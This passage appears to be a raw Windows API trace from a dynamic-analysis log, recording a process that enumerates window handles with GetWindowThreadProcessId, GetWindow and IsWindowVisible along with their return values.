	[0631.311] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18ec
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1898
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc98
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x153c
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1808
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12a4
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1740
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16c4
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1820
	[0631.312] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16ac
	[0631.313] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1858
	[0631.313] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1664
	[0631.313] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10b4
	[0631.313] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10ac
	[0631.313] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10ec
	[0631.313] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1068
	[0631.313] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x17e0
	[0631.313] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x102c
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x17a4
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1050
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1694
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1770
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1720
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x165c
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1578
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16c0
	[0631.314] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x161c
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1638
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x15c8
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1554
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1674
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1520
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14bc
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf8c
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe9c
	[0631.315] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1434
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14ec
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xfcc
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12ac
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1484
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x934
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc0c
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb08
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x948
	[0631.316] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1178
	[0631.317] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x13e0
	[0631.317] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xcd0
	[0631.317] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x13fc
	[0631.317] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdc8
	[0631.317] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc18
	[0631.317] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc2c
	[0631.317] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa1c
	[0631.317] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1244
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdb0
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1398
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1358
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1370
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1340
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x130c
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12c0
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x12e4
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1270
	[0631.318] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1298
	[0631.319] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x120c
	[0631.319] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x122c
	[0631.319] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x11c4
	[0631.319] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x11b0
	[0631.319] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1188
	[0631.319] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1148
	[0631.320] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1160
	[0631.320] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10fc
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe34
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xea4
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x514
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe48
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xbc8
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdf8
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x318
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xcac
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x8bc
	[0631.321] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf9c
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf48
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe40
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xecc
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xeb8
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe80
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe98
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe60
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xee4
	[0631.322] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xf00
	[0631.323] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdf0
	[0631.323] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xe1c
	[0631.323] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xdd0
	[0631.323] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd94
	[0631.323] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd74
	[0631.323] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xd00
	[0631.323] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xcd8
	[0631.323] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc84
	[0631.324] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xca4
	[0631.324] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc64
	[0631.324] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xc24
	[0631.324] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb84
	[0631.325] GetWindow (hWnd=0x1032a, uCmd=0x4) returned 0x0
	[0631.326] IsWindowVisible (hWnd=0x1032a) returned 0
	[0631.326] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xbac
	[0631.326] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x384
	[0631.326] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xab8
	[0631.326] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x33c
	[0631.326] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa44
	[0631.326] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa64
	[0631.326] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x8a8
	[0631.326] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xaf0
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x88c
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb04
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x910
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x230
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xac0
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xab4
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xaac
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x3d0
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x978
	[0631.327] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa7c
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x59c
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa88
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa6c
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa68
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x9f8
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xa04
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x924
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x8dc
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7dc
	[0631.328] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x768
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x764
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x820
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x810
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x794
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x83c
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7ac
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb44
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb5c
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x838
	[0631.329] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x818
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x5b8
	[0631.330] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x494
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1ec
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x440
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x7e8
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x730
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x2c8
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x31c
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x330
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x128
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x5c8
	[0631.331] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x6f8
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x358
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x73c
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0xb0
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x250
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x240
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x790
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x61c
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x540
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0631.332] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x568
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x568
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x540
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x540
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x57c
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x554
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.333] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x528
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x79c
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4e0
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x44c
	[0631.334] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x778
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x558
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1bb4
	[0631.335] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10bc
